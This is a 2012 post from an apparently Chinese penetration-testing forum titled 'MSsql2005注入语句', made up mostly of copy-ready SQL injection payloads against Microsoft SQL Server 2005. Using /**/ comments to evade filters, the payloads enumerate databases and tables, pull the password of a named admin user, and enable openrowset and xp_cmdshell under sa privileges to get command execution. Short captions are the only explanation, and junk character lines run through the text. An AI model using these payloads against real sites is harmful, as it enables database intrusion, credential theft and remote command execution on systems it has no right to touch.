中国网络渗透测试联盟
标题:
MSsql2005注入语句
[打印本页]
作者:
admin
时间:
2012-9-13 17:19
标题:
MSsql2005注入语句
& n' U5 z0 u7 Z
9 C3 r0 y+ Y" q& `0 [& C1 F
$ R9 k! X' |* q
[Copy to clipboard]CODE:
( l/ p9 k- ] e+ ~
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
?4 i& C1 M9 _$ A- x8 g. R
+ ]: b$ R+ b% |3 q
爆表语句,somedb部份是所要列的数据库,红色数字1累加
- g, c) l6 D& G. L
' |- b- Q" D1 [# N: c
7 B$ m( M+ T) b" U
[Copy to clipboard]CODE:
( ]4 r1 b% |, H
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
; [* m* O1 w4 I% k* o6 L! O$ _+ g3 z
7 j+ ~, X8 k, w* K$ P
爆字段语句,爆表admin里user='icerover'的密码段
; v5 K4 s4 K) T9 J3 C# c+ v
1 {9 s! z- h$ \ Q: P, W2 Z
" L! U# R9 c" k& W& L/ J- _
[Copy to clipboard]CODE:
2 w5 B8 s7 z% K0 d; _: @0 i( a
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
$ N/ x+ c: j5 s# {& E; R
# d4 p7 m& t9 o
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
; O( b h b1 U6 i, u0 x% g
如果是sa权限,可以这样来开启
, v; R+ R' L5 |/ }2 f1 t1 g
开启openrowset
9 `% `, ?( L' J; _0 B3 N8 }: j
) ]; d9 R) I% {0 a; R
4 @' A* I& y( R1 ]
[Copy to clipboard]CODE:
( N5 Y% X0 s, b" C0 Y* w8 O( {
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
# y% J |1 S! Q/ m# J9 p
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
3 R; w* ~# ^0 [& k
! G M/ e' ~! A# [% U) U( T
开启xp_cmdshell
8 y7 V, P; ]' Q8 t& y: ~
0 Y) a( ?" E! ]# t: u# f
- C- T+ e- X* U1 F9 M e
[Copy to clipboard]CODE:
; ~" P, V" X9 r1 ~4 k
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
9 ~; m8 J) s& v. x, V/ C$ J+ J
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
3 G3 Y- y, E9 q0 D) W
% A/ z H2 L" \- N5 t' Y; U
ok,over~~晚安
- e' _% x# R& c# O
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2